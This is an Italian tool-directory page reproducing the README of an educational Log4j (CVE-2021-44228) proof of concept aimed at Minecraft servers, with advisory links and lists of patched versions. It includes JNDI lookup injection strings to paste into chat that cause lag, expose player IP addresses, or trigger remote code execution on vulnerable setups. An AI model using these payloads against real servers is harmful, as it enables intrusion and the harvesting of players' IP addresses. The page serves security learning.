Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Log4j-PoC — Un Proof of Concept educativo per la vulnerabilità Log4j (CVE-2021-44228) in Minecraft | Kitploit
Strumenti/GitHubGitHub/sma-das/log4j-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubsma-das/log4j-poc

Log4j-PoC

Un Proof of Concept educativo per la vulnerabilità Log4j (CVE-2021-44228) in Minecraft

Vedi Repository
33 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Proof of Concept per Log4j (CVE-2021-44228)

Dichiarazione di non responsabilità

Questo progetto è solo a scopo educativo.


Introduzione

Questo è un proof of concept dell'RCE di log4j adattato da HyCraftHD.

Ecco alcuni link per la CVE-2021-44228:

  • https://www.lunasec.io/docs/blog/log4j-zero-day
  • https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
  • https://github.com/apache/logging-log4j2/pull/608
  • https://www.youtube.com/watch?v=JPGola6BamU

Questo bug colpisce quasi tutte le versioni di log4j2 e forse log4j1. La versione consigliata da utilizzare è 2.15.0 che risolve l'exploit.

Dimostrazione con minecraft (che usa log4j2)

  • Dettagli sull'impatto su minecraft sono elencati qui: https://twitter.com/slicedlime/status/1469150993527017483
  • Articolo da minecraft qui: https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition
  • Versioni corrette di minecraft forge: https://twitter.com/gigaherz/status/1469331288368861195
  • Articolo dettagliato da minecraft forge: https://gist.github.com/TheCurle/f15a6b63ceee3be58bff5e7a97c3a4e6
  • Versioni corrette di minecraft fabric: https://twitter.com/slicedlime/status/1469192689904193537
  • Versioni corrette di minecraft paper: https://twitter.com/aurora_smiles_/status/1469205803232026625
  • Versioni corrette di minecraft spigot: https://www.spigotmc.org/threads/spigot-security-releases-%E2%80%94-1-8-8%E2%80%931-18.537204/
  • Versioni corrette di minecraft sponge: https://discord.com/channels/142425412096491520/303772747907989504/918744598065586196

Lag o invio di dati serializzati

  • Incolla ${jndi:ldap://127.0.0.1/e} nella chat. Se c'è un socket aperto sulla porta 389, log4j tenta di connettersi e blocca ulteriori comunicazioni fino a che non si verifica un timeout.
  • Quando si utilizza questo exploit proof of concept, il log nella console registrerà THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT! che è un oggetto stringa serializzato dal server ldap.

immagine

  • Inoltre, il server ldap malintenzionato riceve ogni indirizzo IP in cui viene registrato il messaggio. Ciò significa che gli indirizzi IP dei giocatori su un server possono essere raccolti con questo exploit.

RCE

  • Incolla ${jndi:ldap://127.0.0.1/exe} nella chat. Se -Dcom.sun.jndi.ldap.object.trustURLCodebase=true è impostato a true, l'esecuzione remota di codice avverrà.

immagine

  • Fortunatamente i JDK moderni disabilitano il caricamento remoto delle classi per impostazione predefinita. (https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)
  • Le versioni vecchie potrebbero ancora permetterlo!!
Scarica lo strumento